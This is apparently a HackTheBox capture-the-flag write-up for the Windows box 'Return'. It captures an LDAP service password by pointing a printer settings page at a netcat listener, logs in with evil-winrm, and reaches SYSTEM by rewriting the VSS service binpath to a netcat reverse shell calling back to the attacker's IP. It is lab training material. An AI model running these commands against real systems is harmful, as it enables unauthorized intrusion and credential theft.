Return
An easy Windows box from HackTheBox, using an SSRF to capture a password, then modifying a service path to get SYSTEM.
Return
Recon
Usual nmap scan
sudo nmap -p- -sV -oA nmap/return 10.10.11.108
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
80/tcp open http Microsoft IIS httpd 10.0
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-05-20 02:33:18Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: return.local0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp open mc-nmf .NET Message Framing
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49671/tcp open msrpc Microsoft Windows RPC
49674/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49675/tcp open msrpc Microsoft Windows RPC
49679/tcp open msrpc Microsoft Windows RPC
49682/tcp open msrpc Microsoft Windows RPC
49694/tcp open msrpc Microsoft Windows RPC
Service Info: Host: PRINTER; OS: Windows; CPE: cpe:/o:microsoft:windows
Run an initial crackmapexec for some SMB enumeration
kali@kali-$ crackmapexec smb 10.10.11.108
SMB 10.10.11.108 445 PRINTER [*] Windows 10.0 Build 17763 x64 (name:PRINTER) (domain:return.local) (signing:True) (SMBv1:False)
Can also see a settings page when you navigate to the IP
Exploitation
The password is hidden, but can intercept the packet by putting in the kali machine’s IP, and listening with netcat when you hit the update button
nc -lnvp 389
listening on [any] 389 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.108] 63570
0*`%return\svc-printer�
1edFg43012!!
Now we have both a user and password, svc-printer:1edFg43012!!
Now can use evil-winrm to get a cmd prompt on the box
evil-winrm -u svc-printer -p '1edFg43012!!' 10.10.11.108
And get the user flag
After enumerating the groups that the user is a part of, find that the svc-printer user has permissions to start and stop services
*Evil-WinRM* PS C:\Users\svc-printer\desktop> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Server Operators Alias S-1-5-32-549 Mandatory group, Enabled by default, Enabled group
BUILTIN\Print Operators Alias S-1-5-32-550 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\High Mandatory Level Label S-1-16-12288
Then upload netcat.exe to setup a reverse shell as Admin
*Evil-WinRM* PS C:\Users\svc-printer> upload nc64.exe
Would like to get a list of the services that the user can modify, but svc-printer doesn’t have access to the service control manager (sc.exe)
*Evil-WinRM* PS C:\Users\svc-printer> sc.exe query
[SC] OpenSCManager FAILED 5:
Access is denied.
Instead we are going to modify an existing service that we know exists, VSS (Shadow Copy), and insert a malicious binpath to grab a reverse shell
*Evil-WinRM* PS C:\Users\svc-printer> sc.exe config VSS binpath="C:\Users\svc-printer\nc64.exe -e cmd 10.10.14.11 8000"
Then stop the service
sc.exe stop VSS
And start the netcat listener, and start the service - grabbing an Admin shell and SYSTEM access
sc.exe start VSS